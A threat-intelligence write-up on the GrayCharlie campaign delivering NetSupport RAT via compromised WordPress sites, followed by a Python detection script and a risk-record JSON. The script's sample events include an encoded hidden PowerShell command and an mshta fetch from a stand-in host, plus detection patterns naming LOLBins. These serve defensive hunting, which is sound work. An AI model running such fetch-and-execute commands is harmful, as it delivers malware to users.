GrayCharlie Cybercrime Group Exploits WordPress Sites to Deploy NetSupport RAT
Since mid-2023, the cybercriminal group GrayCharlie has been compromising WordPress sites to distribute the NetSupport RAT (Remote Access Trojan), enabling data theft and financial fraud. The group employs sophisticated social engineering tactics, including fake browser update prompts and ClickFix pop-ups, to trick users into downloading malicious payloads.
Once executed, the first-stage malware, including an information stealer and SectopRAT, installs NetSupport RAT. NetSupport is a legitimate remote administration product (NetSupport Manager) that the group abuses for full control of the host: monitoring user activity, harvesting credentials, and exfiltrating sensitive data. GrayCharlie’s infrastructure, primarily hosted with MivoCloud and HZ Hosting Ltd, includes command-and-control (C2) servers and staging systems for deploying additional malware.
A particularly alarming aspect of the campaign is that it defeats multi-factor authentication (MFA) without attacking the second factor itself. Victims are lured into signing in on fake but legitimate-looking login pages; the session cookies and authentication tokens issued after that sign-in are captured and replayed by the attackers, so the account is accessed without ever being challenged for a second factor again.
GrayCharlie employs two primary attack chains:
- Fake Browser Update Chain: Compromised sites display deceptive update prompts, leading users to download and execute malicious payloads.
- ClickFix Chain: Victims are tricked into pasting and running an attacker-supplied command in the Windows Run dialog, so the infection is started by the user rather than by an exploit.
After installation, the malware establishes persistence through registry modifications, ensuring it runs at system startup. It then connects to C2 servers, enabling remote control and data exfiltration.
Recent attacks have targeted industries such as legal services, with activity continuing into 2025. Recorded Future's Insikt Group has identified multiple malicious domains and IP addresses linked to the campaign and urges organizations to block the published indicators of compromise (IOCs) and deploy updated detection rules (YARA, Snort, and Sigma) to mitigate the risk.
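As an added example that is not part of the original report or of the Insikt Group research, the following Python script shows how the two chains and the registry persistence described above could be hunted in host telemetry. The events are constructed Sysmon-style records (process creation, Event ID 1, and registry value set, Event ID 13), not real captures; the domain, paths, user names and the detection patterns are assumptions, as is the use of NetSupport Manager's client32.exe file name as the persistence indicator.

```python
"""Hunt for fake-update, ClickFix and Run-key persistence artifacts.

Constructed example; the events below are not real telemetry and the
patterns are assumptions to be tuned per environment.
"""
import re
from dataclasses import dataclass

# Living-off-the-land binaries typically launched from the Run dialog (assumed list).
LOLBIN_RE = re.compile(r"(?i)\b(powershell|pwsh|mshta|cmd|wscript|cscript|curl|certutil)(\.exe)?\b")
# Hallmarks of a ClickFix one-liner: encoded command, in-memory eval, or a remote fetch.
ENCODED_RE = re.compile(
    r"(?i)(-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|\biex\b|invoke-expression|"
    r"downloadstring|frombase64string|https?://)"
)
# Script hosts a "browser update" download is usually opened with.
SCRIPT_HOST_RE = re.compile(r"(?i)\\(wscript|cscript|mshta)\.exe$")
# User-writable locations a downloaded payload lands in.
USER_PATH_RE = re.compile(r"(?i)\\(Downloads|AppData\\(Local|Roaming)|Temp|ProgramData|Public)\\")
# Registry autostart keys (persistence) and the Run dialog's history (ClickFix residue).
RUN_KEY_RE = re.compile(r"(?i)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\")
RUNMRU_RE = re.compile(r"(?i)\\Explorer\\RunMRU\\")
# NetSupport Manager client binary / config name (assumed indicator, not from the report).
NETSUPPORT_RE = re.compile(r"(?i)\bclient32\.(exe|ini)\b")

# Constructed Sysmon-like events: id 1 = process creation, id 13 = registry value set.
SAMPLE_EVENTS = [
    # 0: ClickFix, the pasted command makes explorer.exe spawn an encoded PowerShell.
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -nop -enc "
                "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"},
    # 1: RunMRU entry left behind by a Run-dialog paste (assumed domain).
    {"id": 13, "image": r"C:\Windows\explorer.exe",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a",
     "details": "mshta https://update-check.example/verify.hta\\1"},
    # 2: fake browser update, the downloaded script is opened from Downloads.
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\victim\Downloads\ChromeUpdate.js"'},
    # 3: NetSupport client persisted through an HKCU Run key from a user-writable path.
    {"id": 13, "image": r"C:\Users\victim\AppData\Roaming\Update\client32.exe",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Client32",
     "details": r"C:\Users\victim\AppData\Roaming\Update\client32.exe"},
    # 4: benign, the user opens a browser from the Start menu.
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\firefox.exe"'},
    # 5: benign, a vendor installer registers its tray app from Program Files.
    {"id": 13, "image": r"C:\Program Files\Vendor\setup.exe",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "details": r"C:\Program Files\Vendor\tray.exe"},
]


@dataclass(frozen=True)
class Finding:
    rule: str
    event_index: int
    evidence: str


def detect(events):
    """Return one Finding per matching rule, in event order."""
    findings = []
    for i, ev in enumerate(events):
        if ev["id"] == 1:
            image, cmd, parent = ev["image"], ev.get("cmdline", ""), ev.get("parent", "")
            # Run dialog launches are children of explorer.exe; a LOLBin child with an
            # encoded/remote-fetch command line is the ClickFix signature.
            from_shell = parent.lower().endswith("\\explorer.exe")
            if from_shell and LOLBIN_RE.search(image) and ENCODED_RE.search(cmd):
                findings.append(Finding("clickfix_run_dialog_lolbin", i, cmd[:60]))
            # A script host executing a file from a download location matches the
            # fake-update chain (user runs what the page told them to download).
            if SCRIPT_HOST_RE.search(image) and USER_PATH_RE.search(cmd):
                findings.append(Finding("fake_update_script_from_user_path", i, cmd[:60]))
        elif ev["id"] == 13:
            target, details = ev["target"], ev.get("details", "")
            if RUNMRU_RE.search(target) and LOLBIN_RE.search(details) and ENCODED_RE.search(details):
                findings.append(Finding("clickfix_runmru_artifact", i, details[:60]))
            elif RUN_KEY_RE.search(target):
                if NETSUPPORT_RE.search(details):
                    findings.append(Finding("netsupport_run_key_persistence", i, details[:60]))
                elif USER_PATH_RE.search(details):
                    findings.append(Finding("run_key_from_user_writable_path", i, details[:60]))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"event {f.event_index}: {f.rule}: {f.evidence}")
```

Run against the constructed sample, the script flags events 0 through 3 and leaves the two benign events alone. The RunMRU rule is worth keeping even where process telemetry is thin: the Run dialog records what the user pasted, so the ClickFix command survives on disk after the PowerShell process is gone.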
Source: https://cyberpress.org/graycharlie-spreads-netsupport-rat/
MivoCloud TPRM report: https://www.rankiteo.com/company/mivocloud
"id": "miv1771961142",
"linkid": "mivocloud",
"type": "Cyber Attack",
"date": "1/2025",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"
{'affected_entities': [{'industry': ['Legal Services'],
'type': 'WordPress Sites'}],
'attack_vector': ['Compromised WordPress Sites',
'Social Engineering',
'Fake Browser Update Prompts',
'ClickFix Pop-ups'],
'data_breach': {'data_exfiltration': True,
'personally_identifiable_information': True,
'sensitivity_of_data': 'High',
'type_of_data_compromised': ['Credentials',
'Sensitive Data',
'Session Cookies',
'Authentication Tokens']},
'date_detected': '2023-06-01',
'description': 'Since mid-2023, the cybercriminal group GrayCharlie has been '
'compromising WordPress sites to distribute the NetSupport RAT '
'(Remote Access Trojan), enabling data theft and financial '
'fraud. The group employs sophisticated social engineering '
'tactics, including fake browser update prompts and ClickFix '
'pop-ups, to trick users into downloading malicious payloads. '
'Once executed, the malware installs NetSupport RAT, granting '
'attackers full system access to monitor activity, harvest '
'credentials, and exfiltrate sensitive data. The campaign can '
'bypass multi-factor authentication (MFA) by capturing session '
'cookies and authentication tokens.',
'impact': {'data_compromised': ['Credentials',
'Sensitive Data',
'Session Cookies',
'Authentication Tokens'],
'identity_theft_risk': 'High',
'operational_impact': 'Remote Control of Infected Systems',
'systems_affected': ['User Systems Infected with NetSupport RAT']},
'initial_access_broker': {'backdoors_established': ['NetSupport RAT'],
'entry_point': ['Fake Browser Update Prompts',
'ClickFix Pop-ups']},
'investigation_status': 'Ongoing',
'motivation': ['Financial Gain', 'Data Theft'],
'post_incident_analysis': {'corrective_actions': ['Blocking Known IOCs',
'Deploying Updated '
'Detection Rules'],
'root_causes': ['Compromised WordPress Sites',
'Social Engineering Tactics']},
'recommendations': ['Block known IOCs',
'Deploy updated detection rules (YARA, Snort, Sigma)',
'Enhance MFA protections to prevent session cookie theft'],
'references': [{'source': 'Insikt Group (Recorded Future)'}],
'response': {'enhanced_monitoring': ['Blocking Known IOCs',
'Deploying Updated Detection Rules '
'(YARA, Snort, Sigma)']},
'threat_actor': 'GrayCharlie',
'title': 'GrayCharlie Cybercrime Group Exploits WordPress Sites to Deploy '
'NetSupport RAT',
'type': ['Malware Distribution', 'Data Theft', 'Financial Fraud']}